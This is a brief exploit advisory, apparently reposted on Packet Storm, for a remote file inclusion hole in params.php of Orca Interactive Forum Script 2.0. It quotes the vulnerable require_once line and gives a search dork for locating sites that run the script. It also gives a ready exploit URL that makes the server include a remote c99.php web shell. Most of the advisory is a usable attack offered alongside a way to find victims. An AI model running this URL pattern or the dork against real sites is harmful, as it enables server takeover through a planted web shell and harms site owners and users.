Orca version 2.0 suffers from a remote file inclusion vulnerability in params.php.
f14327afc57e13b7fd29e69691955106422909e3569f4d2cd704fd909336ff17#####################################################################
#
# Orca - Interactive Forum Script Remote File Inclusion Vulnerability
#
#####################################################################
#
# Discovered by : Ciph3r
#
#
# MAIL : Ciph3r_blackhat@yahoo.com
#
#
# SP tanx4: Iranian hacker & Kurdish security TEAM
#
# sp TANX2: milw0rm.com & google.com & sourceforge.net
#
# CMS download : http://sourceforge.net/project/platformdownload.php?group_id=183624
#
# class : remote
#
# risk : high
#
# Dork : "Powered by Orca Interactive Forum Script"
#
#######################################################################
#
# C0de :
#
#
# require_once ($gConf['dir']['layouts'] . 'base/params.php');
#
#
#######################################################################
EXPLOIT :
http://127.0.0.1/cms/Orca-2.0.beta2/layout/default/params.php?gConf[dir][layouts]=http://127.0.0.1/c99.php?
#######################################################################
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed